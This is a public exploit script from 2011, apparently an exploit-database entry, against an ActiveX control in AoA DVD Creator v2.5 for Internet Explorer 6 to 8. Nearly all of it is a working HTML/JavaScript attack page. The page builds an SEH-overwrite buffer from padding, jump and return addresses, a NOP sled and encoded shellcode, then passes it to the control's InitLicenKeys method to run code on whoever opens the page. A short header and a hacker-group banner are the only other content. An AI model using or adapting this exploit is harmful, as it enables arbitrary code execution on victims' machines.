# Exploit Title: AoA DVD Creator V2.5 Activex
# Date: Febrary 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.aoamedia.com/aoadvdcreator.exe
# Version: v2.5
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8
 
 
<html>
  mail----> shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
 / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
    
 COLOMBIA hacking presents.............
 
AoA DVD Creator exploit IE 6 ,IE 7 , IE 8
NO Heap Spray some badchars :(
the vendor dint replay my emails so here is the exploit
 
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target'></object>
<script language='javascript'>
alert("done");
 
nseh="\xEB\x06\x90\x90";
seh="\xB3\xF1\x07\x10";
nops="\x90\x90\x90\x90\x90\x90\x90";
shell= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4b\x58\x4e\x4e\x45\x45\x4b\x48\x4e\x4e\x4a\x56\x42\x52\x42\x32\x42\x32\x4f\x52\x4a\x36\x43\x56\x41\x36\x4e\x36\x43\x56\x4d\x38\x45\x44\x4a\x4f\x42\x35\x4a\x4b\x47\x4c\x43\x39\x44\x4c\x47\x37\x4f\x4f\x42\x4d\x5a";
junk1="A";
junk2="B";
while (junk1.length<2032){ junk1+=junk1;}
 
junk1=junk1.substring(0,2032);
junk2=junk1;
arg1="defaultV";
arg2="defaultV";
arg3=junk1+nseh+seh+nops+shell+junk2;
arg4="defaultV";
arg5="defaultV";
 
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
alert("done");
 
</script>